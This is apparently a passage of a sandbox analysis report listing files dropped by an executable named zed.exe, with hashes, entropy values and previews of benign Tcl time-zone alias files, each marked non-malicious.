                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:SystemV/MST7MDT) $TZData(:America/Denver)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.831981174214766
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqTQGuQTWLM4YkovXHAIgObTuQTWLovFvHRL/kRQB5nv:SlSNJB9vsM3yciQyLM4YJHAIgObiQyLQ
                                                                                                                                                                                                                                            MD5:B568B46A0207800D9C022BAB1E48709B
                                                                                                                                                                                                                                            SHA1:71CE3F0E75E440D5BBA219BCBB92AF9C1F5A7466
                                                                                                                                                                                                                                            SHA-256:0B8227AFC94082C985E8E125DF83E5EFADE7CD9CA399800D7B8E8B2BEAE22C7D
                                                                                                                                                                                                                                            SHA-512:5067AAD0CD02EBDECA6980F9C7CCC80D076C34D6463C5B6B19B678D76B5E69C1C3639D046F56FE9D6255CBEA49189EDD735F66AD9EE2CB0389BE020E7ED3AD50
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pitcairn)]} {.. LoadTimeZoneFile Pacific/Pitcairn..}..set TZData(:SystemV/PST8) $TZData(:Pacific/Pitcairn)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):5.003766957083974
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3y7DvPHAIgp5N/kQ1p490Dy:JByMY8p5th090W
                                                                                                                                                                                                                                            MD5:7E587175CA0F938C47FA920D787C57BD
                                                                                                                                                                                                                                            SHA1:C3F7D8576C0AC74D6B70F4363EE2C174FADC70B0
                                                                                                                                                                                                                                            SHA-256:D51D9549835E9C058F836C8952932CB53C10F7F194CD87452E9B13494D1C54C9
                                                                                                                                                                                                                                            SHA-512:4460686AAA470F07A6DB1F8957FA4DB600E116273497F46E8A2D3FDECF622122DF753556B78C39FA2ADFDB2AF3C3ABB3C330ADA79B35C6A3CD8C498A0319CEE6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Los_Angeles)]} {.. LoadTimeZoneFile America/Los_Angeles..}..set TZData(:SystemV/PST8PDT) $TZData(:America/Los_Angeles)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.9524733332469095
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqTQG5hB5WXHAIgObT5hByY6RL/kRKlUDH5hBpvn:SlSNJB9vsM3ycT2HAIgOboN/kNv
                                                                                                                                                                                                                                            MD5:5970A466367825D72D9672293FCD4656
                                                                                                                                                                                                                                            SHA1:1A736D61A6797295EEC8C094AED432171E98578E
                                                                                                                                                                                                                                            SHA-256:55710EFDED5B5830B2F3A2A072037C5251E1766F318707ED7CD5EB03037FED43
                                                                                                                                                                                                                                            SHA-512:1F2A1B2A7D0A3E410652546C174D9EC18C91C9327F11C384A0AA1EB12D7EFE85C4D53CA3C2A6C347C0068A4CE92A3138EB17232B0DEC88D52465C5DEDEEE6827
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Gambier)]} {.. LoadTimeZoneFile Pacific/Gambier..}..set TZData(:SystemV/YST9) $TZData(:Pacific/Gambier)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                                                            Entropy (8bit):4.994125896811442
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3y7/9EtDSHAIgp/9Ef6N/kB490/9E9v:JByMY/947p/9XtN90/9s
                                                                                                                                                                                                                                            MD5:560B18DFB138DAF821CFDAE017B94473
                                                                                                                                                                                                                                            SHA1:0BB0312C742CC0097DF033656AE3D10723035C30
                                                                                                                                                                                                                                            SHA-256:DA20018DE301F879E4F026405C69FA0370EB10184FE1C84A4F1504079D5DAFA1
                                                                                                                                                                                                                                            SHA-512:B1D4EAD5F549E319DAD55EE67DAFD732E755164748C08633AA8F07C280B2CF617380D6F886304142D0E4D50026E63678DACFBE2DC809F780BA4CFF35A90DE906
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Anchorage)]} {.. LoadTimeZoneFile America/Anchorage..}..set TZData(:SystemV/YST9YDT) $TZData(:America/Anchorage)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.9295990493611495
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV0XaDovXHAIgoq3XRFvHRL/jCl1yQaqXKv:SlSWB9vsM3ymQa2HAIgoQ/HN/SymKv
                                                                                                                                                                                                                                            MD5:1FABF2DFD4BFD0184AE22ED76F7569E5
                                                                                                                                                                                                                                            SHA1:5859266B26357B4FCADD7EC65847667631E303EB
                                                                                                                                                                                                                                            SHA-256:8471A5575B9D9E47412D851A18A26C4405480540AABC8DAED5F81BE0C714C07C
                                                                                                                                                                                                                                            SHA-512:1DCBECEF6D1F923E6C9CEA70CB10F1FF4E453265966AA88FBC8739E93EF40F8A16AAD85AF4ECC5CC1E52F22F49E5D3F4EE01A97DE2302FC4FBC063FE814F3851
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Istanbul)]} {.. LoadTimeZoneFile Europe/Istanbul..}..set TZData(:Turkey) $TZData(:Europe/Istanbul)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                                                            Entropy (8bit):4.844017562912325
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iGMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/iP8RX
                                                                                                                                                                                                                                            MD5:DA060D2F397C978E0842631B4EC73376
                                                                                                                                                                                                                                            SHA1:649BC85430B04662BE079C0AAD43DF5D5D499D28
                                                                                                                                                                                                                                            SHA-256:356A9BB6F831971C295CF4DCE0F0CDC9EDF94FD686CA3D3195E5F031A0B67CBA
                                                                                                                                                                                                                                            SHA-512:3359BFC6F0837D2DA9D72DA8053773CE0C1A1B1A47C33163BF38965E2104F57BC147F9EEC228A3591B75BF1BA93285AB83E8427E8E2E697AB18501DC017B6E6A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:UCT) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.911775112130145
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/VXEtDovXHAIg20/VXEfovRL/iOGl0IAcGE/VXEN:SlSWB9vsM3y7/9EtDSHAIgp/9Ef6N/i4
                                                                                                                                                                                                                                            MD5:4379C0BF618649AA07CC4BDAC75F62EF
                                                                                                                                                                                                                                            SHA1:7813B54BF2BD0C40A39CA9A29CC50C6D034880A3
                                                                                                                                                                                                                                            SHA-256:CED56F09D68BE00555219594C7B2F3E7EFE8323201FB3E2AA0E1FA9A6467D5AF
                                                                                                                                                                                                                                            SHA-512:AC822061F5C9743120A66E11C02B199253A40460A87F78DC154B0BDD91E410EDDA581E889F5D2A74670939034F39A7F6C7E814E038A1371DAB71EF79A8911AE7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Anchorage)]} {.. LoadTimeZoneFile America/Anchorage..}..set TZData(:US/Alaska) $TZData(:America/Anchorage)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.8886795125313585
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0/yO5WXHAIg20/yOoNvWARL/iObMEIB/4IAcGE/y2:SlSWB9vsM3y7/yrHAIgp/yH0AN/itE8h
                                                                                                                                                                                                                                            MD5:AB14CF1840CBDA2B326660DBD51273B4
                                                                                                                                                                                                                                            SHA1:78144B3A2C75568307E4E86AE3B01EA7F541B011
                                                                                                                                                                                                                                            SHA-256:A4F1398CF84D0AE09BF19288770756622D1710CCBFBFE79E0D3239497731287D
                                                                                                                                                                                                                                            SHA-512:557A3ED9D1401E76291DC41524A1FD04AFF0829CEF66E103CEF9D10CD751F04FDEB6B7C0490302C71297F53AA8DC42930649AD274215D5DF068BCDE837E73756
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Adak)]} {.. LoadTimeZoneFile America/Adak..}..set TZData(:US/Aleutian) $TZData(:America/Adak)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.9334626069754455
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/iQMfQfBx+IAcGEB:SlSWB9vsM3y7OBHAIgpONYyHN/iZfQfl
                                                                                                                                                                                                                                            MD5:30ED80335BE37C7CBA672C33FDE23490
                                                                                                                                                                                                                                            SHA1:B627E86F023FE02A5590FE8D55FF41946BE6D24B
                                                                                                                                                                                                                                            SHA-256:9503403F231BA33415A5F2F0FDD3771CE7FF78534CE83C16A8DB5BC333B4AD8A
                                                                                                                                                                                                                                            SHA-512:C1352612EC0B4FF2F6F279CDB6008D7E9DA7F94F0009EFD959AD3092393150ECA83A09E72C724E1A4BFC3A057B9218D54A87FFA1102E2D9BF058B78AC0A0B1AB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:US/Arizona) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):184
                                                                                                                                                                                                                                            Entropy (8bit):4.90255068822036
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx096yXHAIg20961yHRL/ibXgox/h4IAcGE967:SlSWB9vsM3y796SHAIgp9616N/iB490+
                                                                                                                                                                                                                                            MD5:7770A6B85B2FE73BCCE9D803E0200F23
                                                                                                                                                                                                                                            SHA1:784AD1082FF1569961C2AC44F6D6F7605FBBE766
                                                                                                                                                                                                                                            SHA-256:B6AC9FAE0AB69D58ECFD6B9A84F3C6D3E1A594E40CEEC94E2A0A7855781E173A
                                                                                                                                                                                                                                            SHA-512:EEE79D37D77E6B80B91E8F30CE48B107371F6A58F0C91785E3C74EF210AE1011D0EB913113F1873BE6099B0BE1260410F0C74650446CB377F8FDB5505A44F266
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Chicago)]} {.. LoadTimeZoneFile America/Chicago..}..set TZData(:US/Central) $TZData(:America/Chicago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):228
                                                                                                                                                                                                                                            Entropy (8bit):4.7645631776966715
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/i3E0903GK8:MByMY3GK7Kp3GKnti3t903GK8
                                                                                                                                                                                                                                            MD5:96828B6BA17CA96723794F4B3744B494
                                                                                                                                                                                                                                            SHA1:C3A824A925AEFE2A13A0E65548078D9842C2C7D7
                                                                                                                                                                                                                                            SHA-256:5D86F8D36598516FB2342A18A87DB2701BABD265B0671CC9321C48DB22C7ECA5
                                                                                                                                                                                                                                            SHA-512:2A27A455787DEAC3EC78A2784FB989DAB178E9D6DD7721CD3F5D3337231A3C651994B964D6CE040B7858E0127D7F70C0C48CB0D553D5B725B649C828288224B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:US/East-Indiana) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):5.0345860115708785
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wAy0vfXHAIg20wAyGWARL/i37oxp4IAcGEwAy0yn:SlSWB9vsM3y71RHAIgp1aAN/i37oxp4P
                                                                                                                                                                                                                                            MD5:375DB249106C5D351CA0E84848835EDB
                                                                                                                                                                                                                                            SHA1:ECC5C0C9DA68773B94C9013F4F1A8800D511CC4C
                                                                                                                                                                                                                                            SHA-256:2FFCAD8CBEF5ECDC74DB3EE773E4B18ABC8EFA9C09C4EA8F3A45A08BADAF91A9
                                                                                                                                                                                                                                            SHA-512:21550743BF4E1A79754F76AB201F0EB6BA6B265F43855901640054316A4A32A5D01D266B2441E4A6415720715A2ABD367D82E3D40949A7A66BE9F8366E47A8DD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/New_York)]} {.. LoadTimeZoneFile America/New_York..}..set TZData(:US/Eastern) $TZData(:America/New_York)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.88075715646936
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQG2fWGYFeyXHAIgObT2fWKARL/ioMN75nUDH2fWWv:SlSWB9vsM3yc6e8SHAIgOb6eKAN/ioER
                                                                                                                                                                                                                                            MD5:C0475756CFEC302F737967468804846E
                                                                                                                                                                                                                                            SHA1:85C13CA0A908C69B8BBB6040FC502AFF96B8F8C7
                                                                                                                                                                                                                                            SHA-256:529BB43EFDA6C1584FEAEA789B590CEF1397E33457AB3845F3101B1FC126E0FB
                                                                                                                                                                                                                                            SHA-512:D3FF374443344E8438D50803872E8A8EA077B2299B38C1BD155386B4D2C6008BBD0C0B0B26DE9680812D4AFC9A187B644BDCCB04C23880337228BCEC06D5D61B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Honolulu)]} {.. LoadTimeZoneFile Pacific/Honolulu..}..set TZData(:US/Hawaii) $TZData(:Pacific/Honolulu)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):206
                                                                                                                                                                                                                                            Entropy (8bit):4.87340978435866
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y73GKaHAIgp3GKIN/iGIfh4903GKT:MByMY3GKDp3GKItiBfh4903GKT
                                                                                                                                                                                                                                            MD5:00AAFD60A0B1146274981FAB6336AFD9
                                                                                                                                                                                                                                            SHA1:20AD47ED52874202585C90FE362663F060E064D3
                                                                                                                                                                                                                                            SHA-256:5827B6A6D50CF0FB75D6BA6E36282591AD25E1F0BE636DCFC5D09BDA29A107FD
                                                                                                                                                                                                                                            SHA-512:61113AB72B7D671D7B429106709E73DB57D5B8A382680BA37A54126C7F54BC2D6B47A2584177CE6B434793546DA7EB9B8B7DF9163816DBFC67C83D9930D6A158
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Knox)]} {.. LoadTimeZoneFile America/Indiana/Knox..}..set TZData(:US/Indiana-Starke) $TZData(:America/Indiana/Knox)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.83459089067994
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06FQGFfXHAIg206FQJARL/iHaMCELMr4IAcGE6FQB:SlSWB9vsM3y74PFPHAIgp4KAN/iHaMHs
                                                                                                                                                                                                                                            MD5:D955A5A943B203DC4B87A91ED196B82A
                                                                                                                                                                                                                                            SHA1:C7ACC48AB2033C372C60C741F68B12FFAEA147DE
                                                                                                                                                                                                                                            SHA-256:B4E4269C4FEBFEFF26750B297A590226C0A6872519A6BFDE36F6DC3F6F756349
                                                                                                                                                                                                                                            SHA-512:445DC9A50487A4BA0A7F79078441696DCAA31F9988E5B515B5A827AC9275776B22DE303040900C1726EB99CABA8AD09E57AA674F798EA3FDEBC580E4B87D9439
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Detroit)]} {.. LoadTimeZoneFile America/Detroit..}..set TZData(:US/Michigan) $TZData(:America/Detroit)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.892777905787396
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/iBOlLo/4IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/iBY8/49Z
                                                                                                                                                                                                                                            MD5:E53EDD55E6448C624DD03A8A100EF5AF
                                                                                                                                                                                                                                            SHA1:1D266553CAFA23A3375CFAF7AFE6636553CC7B70
                                                                                                                                                                                                                                            SHA-256:3763BF520D3C97148C34DCFBDF70DEC2636D4E38241555900C058EFEE3BD1256
                                                                                                                                                                                                                                            SHA-512:B7FCF01DBB4231F30FEFA77C339B2CD7D984D6E6182F3BD15D6B64AC9525994E7CBF90C3F1F520FD22B54E19831B3CBAE1C22F04F60244C0C60A1809942422A4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:US/Mountain) $TZData(:America/Denver)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):196
                                                                                                                                                                                                                                            Entropy (8bit):4.932311644026309
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0ydJg4o3vXHAIg20ydJPyHRL/iP+e2IAcGEydJgov:SlSWB9vsM3y7DvPHAIgp5N/ip290Dy
                                                                                                                                                                                                                                            MD5:37AF94FAB52D80AF32C766644892E36D
                                                                                                                                                                                                                                            SHA1:03CE96A3B3EBFC16C9ED192DD2127FB265A7ED49
                                                                                                                                                                                                                                            SHA-256:54E5F126D4E7CC13555841A61FF66C0350621C089F475638A393930B3FB4918C
                                                                                                                                                                                                                                            SHA-512:405A7F414FA0864111E5E9F06FCA675BF4EF11FE0F82F5438416273BEF820A030A50E4D43E4E522ED79C08C0C243E9DD3692971DC912C9ADFB1BEABEB935CDDC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Los_Angeles)]} {.. LoadTimeZoneFile America/Los_Angeles..}..set TZData(:US/Pacific) $TZData(:America/Los_Angeles)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.838968615416201
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/i6A5nUDHurKeTyn:SlSWB9vsM3yciemHAIgObiecN/idXevn
                                                                                                                                                                                                                                            MD5:509CF35F5F7C9567FD19CC5C137DC070
                                                                                                                                                                                                                                            SHA1:AA5F27D36BC617A6A4107E3CA0CB0C10A71A1D9E
                                                                                                                                                                                                                                            SHA-256:E51FC51C65FFEAB514D7636271157EE8941BDACF602CBC380F5D60B5FA674E87
                                                                                                                                                                                                                                            SHA-512:E23633A16F11015F3FE2F4E675B5A60B4FDC61F8CF152FDB9BA7ED4C213B8897117721A78C5470296DAFB0FD4F0DDC019DD0DB8C28C1F1B2BE0D3A289F53D5B3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:US/Samoa) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                                                            Entropy (8bit):4.844017562912325
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iLB5h8RFB:SlSWB9vsM3yzTHAIgm6N/iLfh8RX
                                                                                                                                                                                                                                            MD5:3402C8784654C24F7E956731866B833F
                                                                                                                                                                                                                                            SHA1:C34F3CCA074A50E6564B8C78683C8763B37A3002
                                                                                                                                                                                                                                            SHA-256:DEE28FF84E3FC495ED3547D5E5E9FAFDACC36A67329E747D434248ED45BF1755
                                                                                                                                                                                                                                            SHA-512:FBA2840B0FA0F084EE9840BCF56E497F8A7ABF509FA10FA66FB26BA3D80079C4F9A363577A453CD68557080EAF9DD7F1F7B5AF957B64BDA2A897B1E08C85DD19
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:UTC) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):159
                                                                                                                                                                                                                                            Entropy (8bit):4.879221007428352
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iL7DJMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/iL7VMr8RX
                                                                                                                                                                                                                                            MD5:5F24A249884C241D1E03D758C2641675
                                                                                                                                                                                                                                            SHA1:63AAC15A68659006F8A14FEC3F2A66B55A8AC398
                                                                                                                                                                                                                                            SHA-256:B7B0B82F471D64704E1D6F84646E6B7B2BD9CAB793FAD00F9C9B0595143C0AB7
                                                                                                                                                                                                                                            SHA-512:A7AB5E26A2C23BA296942D7C524C6EE6708A9A38CDD88022EA92E2180BC3CCFE930758FC20A24A0D271AD70733EB924B0E530FBF83CC0FC49EAD411B28503CC0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Universal) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):172
                                                                                                                                                                                                                                            Entropy (8bit):4.999171213761279
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVwTwWXHAIgoqzTbNOARL/gIuyQauTgvn:SlSWB9vsM3ymSHAIgoXAN/gXy5n
                                                                                                                                                                                                                                            MD5:5444E85070CA2E7A52D38D6D53216B88
                                                                                                                                                                                                                                            SHA1:0F9A4FB1156312EBD0B9C81DA2164E89D21878E1
                                                                                                                                                                                                                                            SHA-256:F7DA75B585F45AB501B2889E272FF47B1C4A1D668E40AED7463EB0E8054028C2
                                                                                                                                                                                                                                            SHA-512:BBC94F98C84641392D3A4B67C152E92EDB3011DA329319ADB2485DBEAFD44DED328D80FBCA89E58687E1F0EB6BED8580BBB0075CA42284B6206A8641D76F2DE5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Moscow)]} {.. LoadTimeZoneFile Europe/Moscow..}..set TZData(:W-SU) $TZData(:Europe/Moscow)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6945
                                                                                                                                                                                                                                            Entropy (8bit):3.7806395604065135
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:v6PgDGfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:rQbkIaFF1w0us4qE3+sSGjT
